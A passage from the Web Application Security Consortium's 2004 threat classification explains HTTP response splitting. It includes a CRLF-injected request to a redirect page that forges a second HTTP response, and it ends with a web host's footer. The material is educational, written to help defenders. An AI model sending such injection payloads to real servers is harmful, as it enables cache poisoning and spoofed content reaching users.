Superfluous data everything beyond the end of the second
response is superfluous, and does not conform to the HTTP
standard.
So when the attacker feeds the target with two requests, the first being to the
URL
/redir_lang.jsp?lang=foobar%0d%0aContent
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent
Type:%20text/html%0d%0aContent
Length:%2019%0d%0a%0d%0aShazam
And the second to the URL
/index.html
The target would believe that the first request is matched to the first
response:
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content Length: 0
And that the second request (to /index.html) is matched to the second
response:
HTTP/1.1 200 OK
Content Type: text/html
Content Length: 19
Shazam
And by this, the attacker manages to fool the target.
Now, this particular example is quite naive, as is explained in [1]. It
doesn't take into account some problems with how targets parse the
TCP stream, issues with the superfluous data, problems with the data
68
Copyright 2004, Web Application Security Consortium. All rights reserved.
Unlimited Web Hosting
|
|
|
|
TotalRoute.net Business web hosting division of Vision Web Hosting Inc. All rights reserved. |